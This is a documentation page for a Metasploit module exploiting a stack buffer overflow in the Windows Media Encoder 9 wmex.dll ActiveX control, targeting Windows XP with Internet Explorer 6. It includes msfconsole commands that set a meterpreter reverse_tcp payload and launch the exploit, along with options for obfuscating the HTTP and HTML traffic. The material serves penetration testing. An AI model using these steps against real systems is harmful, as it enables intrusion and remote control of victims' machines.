Metasploit Penetration Testing Framework
Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
This module exploits a stack buffer overflow in Windows Media Encoder 9. When sending an overly long string to the GetDetailsString() method of wmex.dll an attacker may be able to execute arbitrary code.
Rank
Authors
- MC < mc [at] metasploit.com >
References
Exploit Targets
- 0 - Windows XP SP2-SP3 IE 6.0 SP0-SP2 (default)
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/ms08_053_mediaencoder
msf exploit(ms08_053_mediaencoder) > show payloads
msf exploit(ms08_053_mediaencoder) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_053_mediaencoder) > set LHOST [MY IP ADDRESS]
msf exploit(ms08_053_mediaencoder) > exploit
Module Options
| SRVHOST |
The local host to listen on. (default: 0.0.0.0) |
| SRVPORT |
The local port to listen on. (default: 8080) |
| SSL |
Negotiate SSL for incoming connections |
| SSLVersion |
Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH |
The URI to use for this exploit (default is random) |
| ContextInformationFile |
The information file that contains context information |
| DisablePayloadHandler |
Disable the handler code for the selected payload |
| EnableContextEncoding |
Use transient context when encoding payloads |
| WORKSPACE |
Specify the workspace for this module |
| HTML::base64 |
Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape |
Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode |
Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked |
Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression |
Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding |
Enable folding of HTTP headers |
| HTTP::junk_headers |
Enable insertion of random junk HTTP headers |
| TCP::max_send_size |
Maximum tcp segment size. (0 = disable) |
| TCP::send_delay |
Delays inserted before every send. (0 = disable) |